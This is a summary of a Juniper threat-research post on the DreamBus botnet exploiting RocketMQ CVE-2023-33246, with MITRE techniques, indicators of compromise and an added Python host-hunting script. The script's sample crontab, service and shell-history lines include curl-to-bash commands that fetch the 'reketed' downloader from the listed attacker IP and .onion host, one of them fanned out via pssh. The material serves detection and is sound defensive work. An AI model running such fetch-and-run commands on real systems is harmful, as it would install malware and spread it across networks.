DreamBus Botnet Resurfaces, Targets RocketMQ vulnerability | Official Juniper Networks Blogs

DreamBus resurfaces by exploiting the RocketMQ vulnerability CVE-2023-33246 to drop a modular bot that includes a Bash downloader (reketed), a DreamBus main module, and a Monero miner, with TOR-based and direct-download delivery methods. Juniper Threat Labs outlines attack stages from reconnaissance to persistence and lateral movement, highlighting TOR-based C2 and multi-vector propagation. #DreamBus #RocketMQ

Keypoints

  • CVE-2023-33246 RocketMQ vulnerability allowed remote code execution, enabling DreamBus deployment.
  • Reketed downloads the DreamBus main module from a TOR hidden service, then executes and deletes the script; the module is an ELF binary named with a 20-character filename derived from date/md5.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of the RocketMQ vulnerability CVE-2023-33246 to gain initial access. Quote: “In May 2023, a vulnerability affecting RocketMQ servers (CVE-2023-33246), which allows remote code execution, was publicly disclosed.”
  • [T1059.004] Bash – Use of a malicious bash script (reketed) to download and execute payloads. Quote: “starting on June 19th, we detected a series of attacks that involved downloading and executing a malicious bash script named, “reketed”.”
  • [T1105] Ingress Tool Transfer – Downloading the DreamBus main module from remote sources after exploitation. Quote: “The primary function of the reketed bash shell script is to download the DreamBus main module from a TOR hidden service…”
  • [T1027] Obfuscated/Compressed Files and Information – UPX-packed DreamBus main module with modified headers/footers to hinder unpacking. Quote: “The DreamBus main module is an ELF Linux binary that has been packed with UPX, but with modified headers and footers that make unpacking more challenging.”
  • [T1053] Scheduled Task/Job – Persistence via a timer service and a cron job, each configured to re-run the downloader script hourly so the payloads are re-downloaded and reinstalled. Quote: “timer service” is implemented … hourly basis; “cron job” is created and configured to execute the downloader script … hourly frequency.
  • [T1021.004] Remote Services: SSH – Lateral movement over SSH using IT automation tools (Ansible, Knife, Salt, PSSH) to push the infection to remote hosts the compromised system can reach. Quote: “DreamBus bot malware spread laterally. The malicious threat actors leverage widely recognized IT automation tools like ansible, knife, salt and pssh (parallel ssh).”

Indicators of Compromise

  • [IP] 92.204.243.155 – Download Server
  • [Domain] ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion – .onion Download and Control Server
  • [Hash] 1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047 – Bash script downloader
  • [Hash] 601a2ff4a7244ed41dda1c1fc71b10d3cfefa34e2ef8ba71598f41f73c031443 – DreamBus Bot (main module)
  • [Hash] 153b0d0916bd3150c5d4ab3e14688140b34fdd34caac725533adef8f4ab621e2 – DreamBus-related binary (additional hash listed in the article)
  • [Hash] e71caf456b73dade7c65662ab5cf55e02963ee3f2bfb47e5cffc1b36c0844b4d – DreamBus-related binary (additional hash listed in the article)
  • [Hash] 9f740c9042a7c3c03181d315d47986674c50c2fca956915318d7ca9d2a086b7f – DreamBus-related binary (additional hash listed in the article)
  • [Hash] 371319cd17a1ab2d3fb2c79685c3814dc24d67ced3e2f7663806e8960ff9334c – DreamBus-related binary (additional hash listed in the article)
  • [Hash] 21a9f094eb65256e0ea2adb5b43a85f5abfbfdf45f855daab3eb6749c6e69417 – DreamBus-related binary (additional hash listed in the article)
  • [Hash] 0a8779a427aba59a66338d85e28f007c6109c23d6b0a6bd4b251bf0f543a029f – DreamBus-related binary (additional hash listed in the article)
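As an added example (not Juniper's code and not part of the original article), the script below turns the indicators above and the persistence and lateral-movement behaviour described in the MITRE section into host-hunting checks: it matches the download IP, the .onion C2, the payload hashes and the "reketed" script name, flags an hourly cron job or timer that runs a downloader, and flags automation tools (ansible, knife, salt, pssh) fanning a download command out to other hosts. The function names, regexes and sample crontab/unit/history lines are constructed for this example; the 20-character lowercase-hex filename pattern is an assumption about the shape of a filename the report only describes as derived from date/md5.

```python
"""Hunt for DreamBus-style artefacts on a Linux host (added example, not Juniper's code)."""
import hashlib
import re

# Indicators from the report (see the IoC list above).
DOWNLOAD_IP = "92.204.243.155"
ONION_C2 = "ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion"
KNOWN_SHA256 = {
    "1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047": "reketed bash downloader",
    "601a2ff4a7244ed41dda1c1fc71b10d3cfefa34e2ef8ba71598f41f73c031443": "DreamBus main module",
}

# Behavioural leads. The automation tools are the ones the report names; the
# hourly cadence paired with a downloader comes from its persistence section.
DOWNLOADERS = re.compile(r"\b(curl|wget|torsocks|proxychains)\b")
AUTOMATION_TOOLS = re.compile(r"\b(ansible|knife|salt|pssh|parallel-ssh)\b")
HOURLY_CRON = re.compile(r"^(@hourly|\d+\s+\*\s+\*\s+\*\s+\*)\s")
HOURLY_TIMER = re.compile(
    r"^\s*(OnCalendar\s*=\s*hourly|OnUnitActiveSec\s*=\s*(1h|60min|3600s?))\s*$", re.M | re.I)
# Assumption: the report only says the main module's 20-character filename is
# derived from the date and an MD5; lowercase hex is my guess at its shape.
PAYLOAD_NAME = re.compile(r"^[0-9a-f]{20}$")


def network_iocs(text):
    """Return which of the report's network/file-name indicators appear in `text`."""
    hits = []
    if ONION_C2 in text:
        hits.append("onion-c2")
    if DOWNLOAD_IP in text:
        hits.append("download-ip")
    if "reketed" in text:
        hits.append("reketed-script")
    return hits


def scan_cron_line(line):
    """Flag a crontab entry that references the IoCs or runs a downloader hourly."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    findings = network_iocs(line)
    if HOURLY_CRON.match(line) and DOWNLOADERS.search(line):
        findings.append("hourly-downloader")
    return findings


def scan_systemd_timer(timer_unit, service_unit):
    """Pair a .timer with its .service: hourly cadence plus an ExecStart that downloads."""
    findings = []
    exec_start = re.search(r"^\s*ExecStart\s*=\s*(.+)$", service_unit, re.M)
    if exec_start:
        cmd = exec_start.group(1)
        findings += network_iocs(cmd)
        if HOURLY_TIMER.search(timer_unit) and DOWNLOADERS.search(cmd):
            findings.append("hourly-timer-downloader")
    return findings


def scan_shell_history(lines):
    """Lateral-movement lead: an automation tool pushing a download command to other hosts."""
    return [line.strip() for line in lines
            if AUTOMATION_TOOLS.search(line) and (DOWNLOADERS.search(line) or network_iocs(line))]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def classify_file(name, data, known=KNOWN_SHA256):
    """An exact hash match is a confirmed IoC; the filename shape is only a weak lead."""
    digest = sha256_hex(data)
    if digest in known:
        return known[digest]
    if PAYLOAD_NAME.match(name):
        return "20-char hex filename (weak lead; see assumption above)"
    return None


def hunt(crontab, timer_unit, service_unit, history):
    """Run every check over one host's artefacts and return a findings dict."""
    cron_hits = {}
    for line in crontab.splitlines():
        findings = scan_cron_line(line)
        if findings:
            cron_hits[line.strip()] = findings
    report = {"cron": cron_hits,
              "timer": scan_systemd_timer(timer_unit, service_unit),
              "history": scan_shell_history(history)}
    report["suspicious"] = any(report.values())
    return report


# Constructed sample artefacts for the example; they are not from the report.
SAMPLE_CRONTAB = f"""\
# m h dom mon dow command
0 * * * * /usr/bin/torsocks curl -s http://{ONION_C2}/reketed | bash
30 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""
SAMPLE_TIMER = "[Unit]\nDescription=update\n[Timer]\nOnCalendar=hourly\n[Install]\nWantedBy=timers.target\n"
SAMPLE_SERVICE = "[Service]\nExecStart=/bin/sh -c 'curl -s http://92.204.243.155/reketed | sh'\n"
SAMPLE_HISTORY = [
    "ls -la /tmp",
    "pssh -h hosts.txt -l root 'curl -fsSL http://92.204.243.155/reketed | bash'",
    "ansible all -m ping",
]

if __name__ == "__main__":
    import json
    print(json.dumps(hunt(SAMPLE_CRONTAB, SAMPLE_TIMER, SAMPLE_SERVICE, SAMPLE_HISTORY), indent=2))
```

On a live host, feed `hunt()` the output of `crontab -l` for each user plus /etc/cron.d, the `.timer`/`.service` pairs under /etc/systemd/system, and root's shell history; the hourly-downloader and automation-tool checks are leads to triage, not verdicts, while a hash match against the listed IoCs is a confirmed hit.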

Read more: https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability